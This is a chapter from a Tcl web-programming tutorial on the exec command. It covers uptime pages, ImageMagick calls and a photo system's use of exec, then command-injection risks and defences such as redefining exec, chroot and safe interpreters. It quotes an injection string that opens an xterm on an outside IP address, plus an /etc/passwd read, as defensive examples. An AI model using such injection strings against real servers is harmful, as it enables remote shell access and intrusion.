Exec

part of Tcl for Web Nerds by Hal Abelson, Philip Greenspun, and Lydia Sandon; updated July 2011

You can invoke other Unix programs from within a Tcl script. For a Web developer this is either a tremendous convenience or a dangerous security hole.

Let's cover the convenience part first. If we want to have a Web page that displays how long the server has been up and the current load average, the exec command is helpful:

% exec /usr/bin/uptime
  4:04pm  up 29 days,  4:32,  3 users,  load average: 0.61, 0.66, 0.63

To make an AOLserver Tcl page that returns this output, you need only wrap the exec in an API call:

ns_return 200 text/plain [exec /usr/bin/uptime]

The photo sharing system at http://photo.net/photodb/ stores user-uploaded content in the Unix file system and hence makes extensive use of Unix commands to create directories, build thumbnails of uploaded images, etc. Here are some examples of how the photodb system uses exec:

# see how much disk space a user is consuming
set disk_usage [exec du -k $data_path]

# find out how large an uploaded image is (X-Y pixel size)
# by invoking the ImageMagick command "identify"
set identify_str [exec /usr/local/bin/identify -verbose $filename]
regexp {geometry: ([0-9]*)x([0-9]*)} $identify_str match image_x image_y

# create a thumbnail-sized image using the ImageMagick command "convert"
set result_status [exec /usr/local/bin/convert $filename -geometry $size_sm -quality 75 $filename_sm]

# remove a directory of user-uploaded images
if [catch { exec rm -f $path } errmsg] ...

The Dangerous Part

Scripting languages like Perl or Tcl are convenient for Web development, but it is possible to write a script that takes user-supplied input and evaluates it. With Tcl, you run the risk that a user will upload a string containing "[exec /usr/openwin/bin/xterm -display 18.30.0.1]". Because of the [] characters, if this string is ever fed to eval or subst, a cracker would have a shell on your Web server.

If you don't need to use exec, an easy solution to the problem is to redefine it:

% proc exec args { return "happy happy joy joy" }
% exec cat /etc/passwd
happy happy joy joy

If you do need to use exec, at least make sure that your Web server is running as an unprivileged user with limited authority to execute Unix programs. Depending on your publishing requirements and choice of Web server, it may be possible to run the Web server in a chroot() environment (this is very easy with AOLserver 3.0). This changes the root directory as far as the Web server is concerned. Thus a Tcl program running within the Web server will not be able to even look at files or programs elsewhere on the computer.

If you decide to run chrooted, you will have to copy any programs that you actually do need to exec so that they are underneath the Web server's root directory.
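
The double-substitution problem described under "The Dangerous Part", next to two ways of avoiding it, as an added example that is not code from the original chapter. The proc marker is a hypothetical, harmless stand-in for exec, the user comment is constructed sample input, and the last step assumes stock Tcl's safe interpreters (interp create -safe), which the chapter does not discuss.

```tcl
# Added example. "marker" is a hypothetical stand-in for exec that only
# records that it was called, so the demo has no side effects.
set ::calls {}
proc marker {args} { lappend ::calls $args; return "RAN" }

# Constructed sample input: a user-submitted comment with a bracketed command.
set user_input {Nice photo! [marker uptime]}

# Vulnerable: the double quotes expand $user_input, then subst scans the
# resulting string a second time and runs whatever sits inside [ ].
set page_bad [subst "<p>$user_input</p>"]
puts "bad:  $page_bad  (commands run: [llength $::calls])"

# Hardened 1: no second pass. Tcl substitutes once and never rescans the
# value of a variable, so the brackets stay literal text.
set ::calls {}
set page_ok "<p>$user_input</p>"
puts "ok:   $page_ok  (commands run: [llength $::calls])"

# Hardened 2: if a template has to go through subst, brace the template so
# subst expands the template's own $variables, not the data they hold.
set page_tpl [subst -nocommands {<p>$user_input</p>}]
puts "tpl:  $page_tpl  (commands run: [llength $::calls])"

# Defense in depth: run untrusted substitution in a safe interpreter, where
# exec is hidden. This is the built-in counterpart of redefining exec.
set safe [interp create -safe]
set failed [catch {$safe eval [list subst {up: [exec /usr/bin/uptime]}]} err]
puts "safe interp: failed=$failed msg=$err"
interp delete $safe
```

Run it with tclsh; only the first variant should report that a command ran, and the safe interpreter should refuse the exec call.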

More: http://www.tcl.tk/man/tcl8.4/TclCmd/exec.htm

This is the last of the main Tcl topics. For more information, check out aolserver.com and the books referenced in this book.


lsandon@alum.mit.edu